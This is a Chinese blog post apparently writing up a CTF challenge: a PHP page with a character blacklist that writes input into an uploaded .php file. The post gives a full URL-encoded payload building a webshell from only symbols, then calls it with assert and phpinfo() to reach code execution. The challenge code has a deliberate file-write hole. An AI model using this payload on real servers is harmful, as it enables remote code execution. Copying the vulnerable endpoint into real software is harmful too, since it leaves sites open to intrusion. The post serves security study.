美文网首页
webshell bypass(change-3)

webshell bypass(change-3)

作者: 浅影科技 | 来源:发表于2019-01-20 15:04 被阅读0次

前言:

今天弄这个遇到几个坑,还是成功复现,还是感觉多做做题还是很有好处的。

源码:

<?php
ini_set("display_errors", "On");
error_reporting(E_ALL | E_STRICT);
if(!isset($_GET['c'])){
   show_source(__FILE__);
   die();
}
function rand_string( $length ) {
   $chars = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789";
   $size = strlen( $chars );
   $str = '';
   for($i = 0; $i < $length; $i++){      //这里官方给的是$id+ 改成$i++ 就没问题了
       $str .= $chars[ rand( 0, $size - 1 ) ];
   }
   return $str;
}
$data = $_GET['c'];      //这里是我们传入的参数
$black_list = array(' ', '!', '"', '#', '%', '&', '*', ',', '-', '/', '0', '1', '2', '3', '4', '5', '6', '7', '8', '9', ':', '<', '>', '?', '@', 'A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z', '\\', '^', '`', 'a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z', '|', '~');   //可以看到没有过滤 _ $ [ ]
foreach ($black_list as $b) {   //foreach  遍历数组列表给$b
   if (stripos($data, $b) !== false){    //这里是比较我们传参c的内容中是否有$black_list里面
       die("WAF!");            //有就返回waf
   }
}
$filename=rand_string(0x20).'.php';
$folder='uploads/';
$full_filename = $folder.$filename;
if(file_put_contents($full_filename, '<?php '.$data)){
   echo "<a href='".$full_filename."'>WebShell</a></br>";
   echo "Enjoy your webshell~";
}else{
   echo "Some thing wrong...";
}

介绍:

源码中说的很清楚,就是会检测我们传入c的内容,不符合则中断,
看到P神的一篇文章便是正好是不包含数字和字母的webshell,
P神webshell

可以构造payload,有与url中+号会省略,所以要先编码:

?c=%24_%3d%5b%5d.%5b%5d%3b%24__%3d%27%27%3b%24_%3d%24_%5b%27%27%5d%3b%24_%3d%2b%2b%24_%3b%24_%3d%2b%2b%24_%3b%24_%3d%2b%2b%24_%3b%24_%3d%2b%2b%24_%3b%24__.%3d%24_%3b%24_%3d%2b%2b%24_%3b%24_%3d%2b%2b%24_%3b%24__%3d%24_.%24__%3b%24_%3d%2b%2b%24_%3b%24_%3d%2b%2b%24_%3b%24_%3d%2b%2b%24_%3b%24_%3d%2b%2b%24_%3b%24_%3d%2b%2b%24_%3b%24_%3d%2b%2b%24_%3b%24_%3d%2b%2b%24_%3b%24_%3d%2b%2b%24_%3b%24_%3d%2b%2b%24_%3b%24_%3d%2b%2b%24_%3b%24_%3d%2b%2b%24_%3b%24_%3d%2b%2b%24_%3b%24_%3d%2b%2b%24_%3b%24__.%3d%24_%3b%24%7b%27_%27.%24__%7d%5b_%5d(%24%7b%27_%27.%24__%7d%5b__%5d)%3b

image.png

执行命令:

http://127.0.0.1:81/ctf/uploads/euyKWRNN7dmkkIEcmrTHGkxcIfcOLGD0.php?_=assert&__=phpinfo()
image.png

结尾:

很多挖洞并不是拼的脑力,而是体力。

相关文章

网友评论

      本文标题:webshell bypass(change-3)

      本文链接:https://www.haomeiwen.com/subject/hapxjqtx.html